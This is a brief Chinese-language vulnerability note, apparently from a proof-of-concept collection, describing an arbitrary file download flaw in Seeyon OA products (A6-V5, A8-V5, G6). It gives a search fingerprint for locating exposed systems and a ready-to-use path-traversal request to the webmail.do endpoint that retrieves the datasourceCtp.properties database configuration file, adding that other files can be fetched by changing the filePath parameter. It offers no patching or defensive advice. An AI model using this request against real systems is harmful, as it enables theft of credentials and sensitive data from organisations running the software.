致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息
致远OA A6-V5 致远OA A8-V5 致远OA G6
app="致远互联-OA"
验证POC
/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties
在漏洞的OA 系统将会下载 datasourceCtp.properties 配置文件
datasourceCtp.properties
更改参数 filePath 可下载其他文件